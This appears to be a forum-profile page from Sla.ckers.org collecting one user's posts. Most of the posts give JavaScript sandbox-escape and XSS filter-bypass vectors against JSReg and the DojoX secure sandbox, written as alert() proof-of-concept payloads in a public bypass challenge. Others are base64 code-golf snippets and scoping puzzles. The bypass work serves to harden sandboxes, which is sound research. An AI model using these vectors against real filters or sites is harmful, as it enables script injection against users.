Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

1 year ago
Jonas Magazinius
Found two bugs in the fix for the previous bug. Quote: for (j= element.attributes.length; --j>0;) element.removeAttributeNode(element.attributes[ i]); First bug is in the loop control. Should be either j-->0 or --j>=0. Currently you don't check the first attribute: document.body.innerHTML='<input onblur="alert(1)">' The second bug is in the same piece of code.
Forum: XSS Info
2 years ago
Jonas Magazinius
I'll add one that I found a while ago but did not yet have time to explore: /./iiin({}) // Chrome only
Forum: XSS Info
3 years ago
Jonas Magazinius
I did have a working bypass without eval before your fix >:) alert(window[\u3000/'('),(')'/i,'location']) // replace \u3000 with actual char Here's a new FF one which bypasses the latest update: this['']=1; eval('$\u200bin\u200bfunction\u200b$()/"/,alert(location)//";')
Forum: XSS Info
3 years ago
Jonas Magazinius
You ask, I hack.. this['']=1; i=1; alert(eval('window[\u00a0/"("),(")"/i,"location"]')) And there's plenty more where that came from... ;D The "("),(")" trickery is just to get balanced parenthesis in FF. Chrome is much simpler: alert(eval('window[\u00a0/0),(0/i,"location"]'))
Forum: XSS Info
3 years ago
Jonas Magazinius
Good catch LeverOne! And good suggestion using [] instead.
Forum: XSS Info
3 years ago
Jonas Magazinius
I planned on using this inconsistency in my next bypass, but I have so much other stuff to take care of. 0[{}/'regex and string'/+0] When verifying the object accessor you are verifying an expression, but the way you verify it interprets it as a statement. In the above statement, the verification sees "a block, a regex plus zero" whereas JSReg sees "an object divided by a stri
Forum: XSS Info
3 years ago
Jonas Magazinius
There's still a problem with the infix: 0[0] ++{}[0]
Forum: XSS Info
3 years ago
Jonas Magazinius
@LeverOne: Really nice vectors! I'm still trying to wrap my head around them.. The ++ operator seems to be the way to get JSReg into a faulty state.
Forum: XSS Info
3 years ago
Jonas Magazinius
I thought I'd just add the vectors I found for future reference, even though you already fixed them. alert(window[0[0]/*/ --/*//*/>0),('location' /*/]) alert(window[0[0] /*/-->0),('location' /*/]) alert(window[0[0] -->0),('location' ])
Forum: XSS Info
3 years ago
Jonas Magazinius
My latest bypass uses some JavaScript magic that I didn't even know about until today: try{throw window}catch(x/**/ if(x)['location']='javascript:alert(window.location)'){} Evaluating expressions inside the catch-variable definition.. Oh, and this is probably FF specific. And btw, here's a way to make array comprehensions work again: [_/**/ for(_ in[])] And for..in loops are broken:
Forum: XSS Info
3 years ago
Jonas Magazinius
I'm on a roll today.. this['__proto__']=window; alert(this['location'])
Forum: XSS Info
3 years ago
Jonas Magazinius
Some problems with getters and setters: +{get _()/'/+alert(window.location)}.$_$//' ({set _(_)/'/+alert(window.location)}).$_$=0//' EDIT: Another way to do the same thing: ({get _()/ /*/*/0/+alert(window[),('location'])})._//*/0})
Forum: XSS Info
3 years ago
Jonas Magazinius
When was the last time you had an issue with the comment parsing? alert-->0/* (window[),('location'])/**/ The --> is only a comment IF there is a <!-- present before it. Similarly for IE (using IE8, not sure about other versions): alert<!--0[0]/*--> (window[),('location'])/**/ Generator bugs: [_ for(_ in 0)] [/0/ for(_ in 0)] [0 for(_ in 0)if(0)] [[] for(_
Forum: XSS Info
3 years ago
Jonas Magazinius
@Gareth - About the generator stuff; I know you don't allow them, but in the version I was using at that time the translation was [0 for $r$($x$ in 0)]. Now it works as it should! ;) There are still some problems with Arrays and operators, but nothing I've managed to exploit.. []+0 []-0 []*0 ~[] Some other problems: ++/0/[0] []?[]:[] 0+ +0 if(0){}else; if(0) {} This
Forum: XSS Info
3 years ago
Jonas Magazinius
@barbarianbob: The effect is due to variable declaration hoisting. Your example (good one btw) should translate to the following, according to ECMAScript standard: var y; function y(){} y=123; { } y; This is exactly what GC is doing. Firefox does something like this: var y; y=123; { y=function y(){} } y; Since JS does not have block scoping, we can actually omit the blocks:
Forum: Obfuscation
3 years ago
Jonas Magazinius
var x=1; try{ y(); throw 2; } catch(x){ function y(){ alert(x); } y(); } What will this alert in Firefox the first, second and third time you execute it? What will this alert in Chrome?
Forum: Obfuscation
3 years ago
Jonas Magazinius
Wow LeverOne, impressive stuff! Here's a new kind of vector that I don't remember seeing before: []/0//alert(window[),('location']) Translates into: ;[];/(?:)/.$constructor$(/0/)/$alert$($window$) The browser sees Array/0//comment, but JSReg sees Array;RegExp/alert(...) In the comment we can put any syntax that will break the JSReg parser. Another bug: [0 for(x in 0)] You s
Forum: XSS Info
3 years ago
Jonas Magazinius
Back from my short vacation! First off, fantastic work noma! I was trying to do something similar before, but never got it quite right. Your innovation inspired me to cut it down even further: 113 chars: function(a,b,c,d,e,f){for(d=e=f='';a||(b='=')&&e;e&=3)f+=b[63&(c=c<<8|a.charCodeAt(d-=!e++))>>e*2];return f} Actually 112 chars: function(a,b,c,d,e,f){for(d=
Forum: Obfuscation
3 years ago
Jonas Magazinius
This is still work in progress, but I have to share this. Single loop, incorrect padding and can't handle null chars, but it's beautiful! 99 chars: function(a,b,c,d,e,f){for(e=f='';!d--||f%3?c=c<<8|a.charCodeAt(f++,d=4):e+=b;);return e} Single loop, correct padding, but can't handle null chars: 115 chars: function(a,b,c,d,e,f){for(e=f='';!d--||f%3?c=c<<8|a.charCodeAt(f+
Forum: Obfuscation
3 years ago
Jonas Magazinius
Ok, I think I've reached a fixpoint for now. No cheating, no leaking, merged two loops. 123 chars: function(a,b,c,d,e,f){for(e=f='';b[1];d=4)for(c=c<<8|a.charCodeAt(f++);!(f%3)&&d--;b=a?b:'=')e+=b;return e}
Forum: Obfuscation
3 years ago
Jonas Magazinius
@LeverOne: Brilliant work as usual! But I managed to reduce it a bit.. 129 chars: function(a,b){for(var c=d=e=f='';a[+f];){for(;c=c<<8|a.charCodeAt(f++),f%3;);for(d=4;d--;)e+=b?c>>d*6&63:64]}return e}
Forum: Obfuscation
3 years ago
Jonas Magazinius
Ok, here's one. Not very optimized, but handles all input with correct padding: y='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; x=function(a)a.charCodeAt(); '\xff\xff\xff'.replace(/(.)(.)?(.)?/g,function(_,a,b,c)y+y[63&x(a)<<4|x(b)>>4]+(b?y[63&x(b)<<2|x(c)>>6]:'=')+(c?y[63&x(c)]:'='))
Forum: Obfuscation
3 years ago
Jonas Magazinius
Some major WTFs when reading this implementation of base64: http://www.herongyang.com/encoding/Base64-Goetz-JavaScript-Implementation.html How about: if (uc != true && uc != false) return null; LOL!
Forum: Obfuscation
3 years ago
Jonas Magazinius
I'm working on it, but in the meantime I think your function is wrong on some inputs: x('\xff\xff\xff'.split(''),'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')
Forum: Obfuscation
3 years ago
Jonas Magazinius
Here's one that is not so well known.. DojoX sandbox, part of the dojo toolkit. http://o.sitepen.com/labs/code/secure/dojox/secure/tests/load.html Oh, btw.. It can be easily bypassed. Let's make it a challenge to find new ways of bypassing it! Here's a first entry: var window; delete window; alert(window); Access to window is prohibited, but by declaring a local variable named windo
Forum: Sandbox
3 years ago
Jonas Magazinius
@LeverOne: Thanks, I admire your work :) And two more.. []instanceof{}/alert(top)// []in{}/alert(top)//
Forum: XSS Info
3 years ago
Jonas Magazinius
Sorry, but here's another one.. (function(){}['constructor'])('alert(top)')() (function(){}/alert(top)/1)
Forum: XSS Info
3 years ago
Jonas Magazinius
A new kind of problem: 0/function(){}/alert(top)// Also, this causes endless loop: 0/function(){}/ Found while trying to exploit this: function()[]
Forum: XSS Info
3 years ago
Jonas Magazinius
Turns out the problem runs a bit deeper than I thought: while(0)/'/;alert(top)// if(0)/'/;alert(top)// for(;0;)/'/;alert(top)// with(0)/'/;alert(top)// Not sure if these are a separate issue or not.
Forum: XSS Info
3 years ago
Jonas Magazinius
BTW, if you want to make it defensive; one thing I look for when testing is situations where [] is incorrectly parsed as index instead of array and rewritten to This should never happen since the index should always have an expression in it, i.e. [][] gives syntax error. When I find this I know that / will be incorrectly parsed as division instead of regex.
Forum: XSS Info